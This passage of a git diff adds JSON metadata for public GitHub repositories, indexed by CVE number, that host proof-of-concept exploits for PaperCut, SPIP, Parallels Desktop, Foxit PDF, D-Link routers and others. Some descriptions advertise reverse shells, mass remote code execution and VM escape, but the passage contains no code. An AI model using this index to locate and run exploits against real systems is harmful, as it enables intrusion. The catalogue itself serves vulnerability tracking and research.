"forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 861116698, + "name": "exploit_CVE-2023-27163", + "full_name": "btar1gan\/exploit_CVE-2023-27163", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2023-27163", + "description": null, + "fork": false, + "created_at": "2024-09-22T03:33:18Z", + "updated_at": "2024-09-22T03:33:56Z", + "pushed_at": "2024-09-22T03:33:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27216.json b/2023/CVE-2023-27216.json new file mode 100644 index 0000000000..042615ba2e --- /dev/null +++ b/2023/CVE-2023-27216.json @@ -0,0 +1,64 @@ +[ + { + "id": 629452234, + "name": "CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "full_name": "FzBacon\/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "owner": { + "login": "FzBacon", + "id": 48304150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48304150?v=4", + "html_url": "https:\/\/github.com\/FzBacon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FzBacon\/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection", + "description": null, + "fork": false, + "created_at": "2023-04-18T10:45:42Z", + "updated_at": "2024-05-03T15:55:26Z", + "pushed_at": "2023-04-18T10:45:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840260411, + "name": "CVE-2023-27216", + "full_name": "HoangREALER\/CVE-2023-27216", + "owner": { + "login": "HoangREALER", + "id": 90048856, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90048856?v=4", + "html_url": "https:\/\/github.com\/HoangREALER", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangREALER\/CVE-2023-27216", + "description": "Newbie's approach to firmware hacking", + "fork": false, + "created_at": "2024-08-09T10:05:34Z", + "updated_at": "2024-10-11T00:57:22Z", + "pushed_at": "2024-08-13T13:40:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2728.json b/2023/CVE-2023-2728.json new file mode 100644 index 0000000000..0dd85e55c8 --- /dev/null +++ b/2023/CVE-2023-2728.json @@ -0,0 +1,33 @@ +[ + { + "id": 852879948, + "name": "Metasploit-Module-TFM", + "full_name": "Cgv-Dev\/Metasploit-Module-TFM", + "owner": { + "login": "Cgv-Dev", + "id": 128702955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128702955?v=4", + "html_url": "https:\/\/github.com\/Cgv-Dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cgv-Dev\/Metasploit-Module-TFM", + "description": "Module written in Ruby with the objective of exploiting vulnerabilities CVE-2023-2728 and CVE-2024-3177, both related to the secret mount policy in a Kubernetes cluster using a custom Metasploit module. Part of a Cybersecurity Master's degree finalization project.", + "fork": false, + "created_at": "2024-09-05T15:30:51Z", + "updated_at": "2024-09-05T17:44:53Z", + "pushed_at": "2024-09-05T17:44:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2732.json b/2023/CVE-2023-2732.json new file mode 100644 index 0000000000..a84c8d6d95 --- /dev/null +++ b/2023/CVE-2023-2732.json @@ -0,0 +1,99 @@ +[ + { + "id": 645286751, + "name": "CVE-2023-2732", + "full_name": "RandomRobbieBF\/CVE-2023-2732", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-2732", + "description": "MStore API <= 3.9.2 - Authentication Bypass", + "fork": false, + "created_at": "2023-05-25T10:18:48Z", + "updated_at": "2024-10-03T17:05:08Z", + "pushed_at": "2023-05-25T11:09:11Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 649961452, + "name": "WP-CVE-2023-2732", + "full_name": "Jenderal92\/WP-CVE-2023-2732", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/WP-CVE-2023-2732", + "description": "Python 2.7", + "fork": false, + "created_at": "2023-06-06T02:59:22Z", + "updated_at": "2024-08-12T20:31:37Z", + "pushed_at": "2023-06-13T22:16:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 674914853, + "name": "CVE-2023-2732", + "full_name": "ThatNotEasy\/CVE-2023-2732", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-2732", + "description": "Perform With Massive Authentication Bypass (Wordpress Mstore-API)", + "fork": false, + "created_at": "2023-08-05T06:38:53Z", + "updated_at": "2024-08-12T20:32:21Z", + "pushed_at": "2023-08-05T06:43:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication", + "bypass", + "wordpress" + ], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27326.json b/2023/CVE-2023-27326.json new file mode 100644 index 0000000000..d4b4daa13f --- /dev/null +++ b/2023/CVE-2023-27326.json @@ -0,0 +1,73 @@ +[ + { + "id": 616438294, + "name": "CVE-2023-27326", + "full_name": "Impalabs\/CVE-2023-27326", + "owner": { + "login": "Impalabs", + "id": 82209949, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82209949?v=4", + "html_url": "https:\/\/github.com\/Impalabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Impalabs\/CVE-2023-27326", + "description": "VM Escape for Parallels Desktop <18.1.1", + "fork": false, + "created_at": "2023-03-20T11:47:54Z", + "updated_at": "2024-11-06T16:28:22Z", + "pushed_at": "2024-03-15T02:02:35Z", + "stargazers_count": 170, + "watchers_count": 170, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 170, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 636732300, + "name": "CVE-2023-27326", + "full_name": "Malwareman007\/CVE-2023-27326", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-27326", + "description": "VM Escape for Parallels Desktop <18.1.1", + "fork": false, + "created_at": "2023-05-05T14:11:18Z", + "updated_at": "2024-08-10T17:57:23Z", + "pushed_at": "2023-05-07T13:24:23Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27326", + "exploit", + "local-attacker", + "parallel-desktop", + "privilege-escalation", + "toolgate", + "vm", + "vm-escape" + ], + "visibility": "public", + "forks": 6, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27327.json b/2023/CVE-2023-27327.json new file mode 100644 index 0000000000..6e489ae3ac --- /dev/null +++ b/2023/CVE-2023-27327.json @@ -0,0 +1,33 @@ +[ + { + "id": 638653948, + "name": "parallels-plist-escape", + "full_name": "kn32\/parallels-plist-escape", + "owner": { + "login": "kn32", + "id": 105210950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105210950?v=4", + "html_url": "https:\/\/github.com\/kn32", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn32\/parallels-plist-escape", + "description": "Exploits for CVE-2023-27327 and CVE-2023-27328", + "fork": false, + "created_at": "2023-05-09T20:14:43Z", + "updated_at": "2023-08-17T12:00:48Z", + "pushed_at": "2023-05-09T22:35:28Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27350.json b/2023/CVE-2023-27350.json new file mode 100644 index 0000000000..adf78dd6f8 --- /dev/null +++ b/2023/CVE-2023-27350.json @@ -0,0 +1,254 @@ +[ + { + "id": 630841704, + "name": "CVE-2023-27350-POC", + "full_name": "MaanVader\/CVE-2023-27350-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-27350-POC", + "description": "A simple python script to check if a service is vulnerable", + "fork": false, + "created_at": "2023-04-21T09:19:13Z", + "updated_at": "2024-01-07T22:14:44Z", + "pushed_at": "2023-05-12T13:20:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631055942, + "name": "CVE-2023-27350-POC", + "full_name": "imancybersecurity\/CVE-2023-27350-POC", + "owner": { + "login": "imancybersecurity", + "id": 106005322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106005322?v=4", + "html_url": "https:\/\/github.com\/imancybersecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imancybersecurity\/CVE-2023-27350-POC", + "description": null, + "fork": false, + "created_at": "2023-04-21T20:13:47Z", + "updated_at": "2024-12-06T21:40:30Z", + "pushed_at": "2024-12-06T21:40:27Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631387134, + "name": "CVE-2023-27350", + "full_name": "horizon3ai\/CVE-2023-27350", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27350", + "description": "Proof of Concept Exploit for PaperCut CVE-2023-27350", + "fork": false, + "created_at": "2023-04-22T21:34:06Z", + "updated_at": "2024-12-27T02:54:43Z", + "pushed_at": "2023-05-01T19:31:20Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 50, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 632645209, + "name": "CVE-2023-27350", + "full_name": "adhikara13\/CVE-2023-27350", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2023-27350", + "description": "Exploit for Papercut CVE-2023-27350. [+] Reverse shell [+] Mass checking", + "fork": false, + "created_at": "2023-04-25T20:51:23Z", + "updated_at": "2024-03-26T05:53:14Z", + "pushed_at": "2023-04-25T21:34:11Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646129279, + "name": "CVE-2023-27350", + "full_name": "ThatNotEasy\/CVE-2023-27350", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27350", + "description": "Perfom With Massive Authentication Bypass In PaperCut MF\/NG", + "fork": false, + "created_at": "2023-05-27T11:32:35Z", + "updated_at": "2024-08-12T20:31:30Z", + "pushed_at": "2023-07-24T22:21:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "papercut", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653346311, + "name": "CVE-2023-27350", + "full_name": "Jenderal92\/CVE-2023-27350", + "owner": { + "login": "Jenderal92", + "id": 59664965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59664965?v=4", + "html_url": "https:\/\/github.com\/Jenderal92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jenderal92\/CVE-2023-27350", + "description": "Python 2.7", + "fork": false, + "created_at": "2023-06-13T22:13:24Z", + "updated_at": "2024-08-12T20:31:42Z", + "pushed_at": "2023-06-13T22:25:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788787317, + "name": "CVE-2023-27350", + "full_name": "ASG-CASTLE\/CVE-2023-27350", + "owner": { + "login": "ASG-CASTLE", + "id": 160751832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160751832?v=4", + "html_url": "https:\/\/github.com\/ASG-CASTLE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASG-CASTLE\/CVE-2023-27350", + "description": null, + "fork": false, + "created_at": "2024-04-19T04:47:10Z", + "updated_at": "2024-04-19T04:47:11Z", + "pushed_at": "2024-04-19T04:51:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798859972, + "name": "CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "full_name": "rasan2001\/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "rasan2001", + "id": 156652838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4", + "html_url": "https:\/\/github.com\/rasan2001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rasan2001\/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-05-10T16:14:22Z", + "updated_at": "2024-08-01T14:12:13Z", + "pushed_at": "2024-05-10T16:15:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27363.json b/2023/CVE-2023-27363.json new file mode 100644 index 0000000000..61c5466688 --- /dev/null +++ b/2023/CVE-2023-27363.json @@ -0,0 +1,95 @@ +[ + { + "id": 641026084, + "name": "CVE-2023-27363", + "full_name": "qwqdanchun\/CVE-2023-27363", + "owner": { + "login": "qwqdanchun", + "id": 48477028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48477028?v=4", + "html_url": "https:\/\/github.com\/qwqdanchun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qwqdanchun\/CVE-2023-27363", + "description": null, + "fork": false, + "created_at": "2023-05-15T16:09:19Z", + "updated_at": "2023-08-13T19:36:12Z", + "pushed_at": "2023-08-13T23:30:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 653394072, + "name": "CVE-2023-27363", + "full_name": "webraybtl\/CVE-2023-27363", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2023-27363", + "description": "福昕Foxit PDF远程代码执行漏洞CVE-2023-27363分析与复现", + "fork": false, + "created_at": "2023-06-14T01:18:09Z", + "updated_at": "2024-03-21T06:47:15Z", + "pushed_at": "2023-07-06T06:34:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 702915781, + "name": "-Foxit-PDF-CVE-2023-27363-", + "full_name": "CN016\/-Foxit-PDF-CVE-2023-27363-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/-Foxit-PDF-CVE-2023-27363-", + "description": "福昕Foxit PDF远程代码执行漏洞(CVE-2023-27363)", + "fork": false, + "created_at": "2023-10-10T08:52:08Z", + "updated_at": "2023-10-10T08:52:09Z", + "pushed_at": "2023-10-10T09:03:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27372.json b/2023/CVE-2023-27372.json new file mode 100644 index 0000000000..818709cc1e --- /dev/null +++ b/2023/CVE-2023-27372.json @@ -0,0 +1,269 @@ +[ + { + "id": 655758961, + "name": "CVE-2023-27372", + "full_name": "nuts7\/CVE-2023-27372", + "owner": { + "login": "nuts7", + "id": 66285128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66285128?v=4", + "html_url": "https:\/\/github.com\/nuts7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuts7\/CVE-2023-27372", + "description": "SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.", + "fork": false, + "created_at": "2023-06-19T14:36:47Z", + "updated_at": "2025-01-05T02:39:57Z", + "pushed_at": "2024-10-13T21:08:54Z", + "stargazers_count": 65, + "watchers_count": 65, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-27372", + "cve2023", + "deserialization", + "exploit", + "nuclei", + "nuclei-templates", + "php", + "poc", + "rce", + "remote-code-execution", + "spip", + "vulnerability", + "web-hacking" + ], + "visibility": "public", + "forks": 7, + "watchers": 65, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 658452469, + "name": "CVE-2023-27372", + "full_name": "Chocapikk\/CVE-2023-27372", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-27372", + "description": "SPIP Vulnerability Scanner - CVE-2023-27372 Detector", + "fork": false, + "created_at": "2023-06-25T19:30:08Z", + "updated_at": "2025-01-05T04:54:26Z", + "pushed_at": "2023-09-16T23:13:58Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 661062372, + "name": "CVE-2023-27372", + "full_name": "dream434\/CVE-2023-27372", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2023-27372", + "description": "spip", + "fork": false, + "created_at": "2023-07-01T17:08:36Z", + "updated_at": "2024-08-02T12:55:02Z", + "pushed_at": "2024-08-02T12:54:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 662629965, + "name": "CVE-2023-27372-PoC", + "full_name": "0SPwn\/CVE-2023-27372-PoC", + "owner": { + "login": "0SPwn", + "id": 103416140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103416140?v=4", + "html_url": "https:\/\/github.com\/0SPwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0SPwn\/CVE-2023-27372-PoC", + "description": "This is a PoC for CVE-2023-27372 which spawns a fully interactive shell. ", + "fork": false, + "created_at": "2023-07-05T14:41:03Z", + "updated_at": "2024-10-14T08:56:46Z", + "pushed_at": "2023-07-05T14:42:24Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665042042, + "name": "CVE-2023-27372-POC", + "full_name": "izzz0\/CVE-2023-27372-POC", + "owner": { + "login": "izzz0", + "id": 88706802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88706802?v=4", + "html_url": "https:\/\/github.com\/izzz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/izzz0\/CVE-2023-27372-POC", + "description": "CVE-2023-27372-SPIP-CMS-Bypass", + "fork": false, + "created_at": "2023-07-11T10:00:04Z", + "updated_at": "2023-07-19T03:20:54Z", + "pushed_at": "2023-07-12T05:14:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673080065, + "name": "CVE-2023-27372", + "full_name": "ThatNotEasy\/CVE-2023-27372", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27372", + "description": "Perform With Mass Remote Code Execution In SPIP Version (4.2.1)", + "fork": false, + "created_at": "2023-07-31T20:32:36Z", + "updated_at": "2024-08-12T20:32:18Z", + "pushed_at": "2023-07-31T20:54:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "rce-exploit", + "remote-code-execution", + "spip-plugin" + ], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 688571632, + "name": "CVE-2023-27372-PoC", + "full_name": "redboltsec\/CVE-2023-27372-PoC", + "owner": { + "login": "redboltsec", + "id": 144297535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144297535?v=4", + "html_url": "https:\/\/github.com\/redboltsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redboltsec\/CVE-2023-27372-PoC", + "description": "This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.", + "fork": false, + "created_at": "2023-09-07T16:17:03Z", + "updated_at": "2023-09-07T16:20:50Z", + "pushed_at": "2023-09-07T16:20:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843121866, + "name": "CVE-2023-27372", + "full_name": "1amthebest1\/CVE-2023-27372", + "owner": { + "login": "1amthebest1", + "id": 165074489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165074489?v=4", + "html_url": "https:\/\/github.com\/1amthebest1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1amthebest1\/CVE-2023-27372", + "description": null, + "fork": false, + "created_at": "2024-08-15T20:36:59Z", + "updated_at": "2024-08-15T20:39:41Z", + "pushed_at": "2024-08-15T20:39:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2744.json b/2023/CVE-2023-2744.json new file mode 100644 index 0000000000..1ebd603cfc --- /dev/null +++ b/2023/CVE-2023-2744.json @@ -0,0 +1,33 @@ +[ + { + "id": 737479723, + "name": "CVE-2023-2744", + "full_name": "pashayogi\/CVE-2023-2744", + "owner": { + "login": "pashayogi", + "id": 50790111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50790111?v=4", + "html_url": "https:\/\/github.com\/pashayogi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pashayogi\/CVE-2023-2744", + "description": "Mass CVE-2023-2744", + "fork": false, + "created_at": "2023-12-31T07:27:17Z", + "updated_at": "2024-08-12T20:33:08Z", + "pushed_at": "2023-12-31T07:30:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27470.json b/2023/CVE-2023-27470.json new file mode 100644 index 0000000000..98fad2f793 --- /dev/null +++ b/2023/CVE-2023-27470.json @@ -0,0 +1,33 @@ +[ + { + "id": 689935383, + "name": "CVE-2023-27470_Exercise", + "full_name": "3lp4tr0n\/CVE-2023-27470_Exercise", + "owner": { + "login": "3lp4tr0n", + "id": 32691065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32691065?v=4", + "html_url": "https:\/\/github.com\/3lp4tr0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3lp4tr0n\/CVE-2023-27470_Exercise", + "description": null, + "fork": false, + "created_at": "2023-09-11T08:04:08Z", + "updated_at": "2024-09-16T13:10:16Z", + "pushed_at": "2023-09-11T09:00:50Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27524.json b/2023/CVE-2023-27524.json new file mode 100644 index 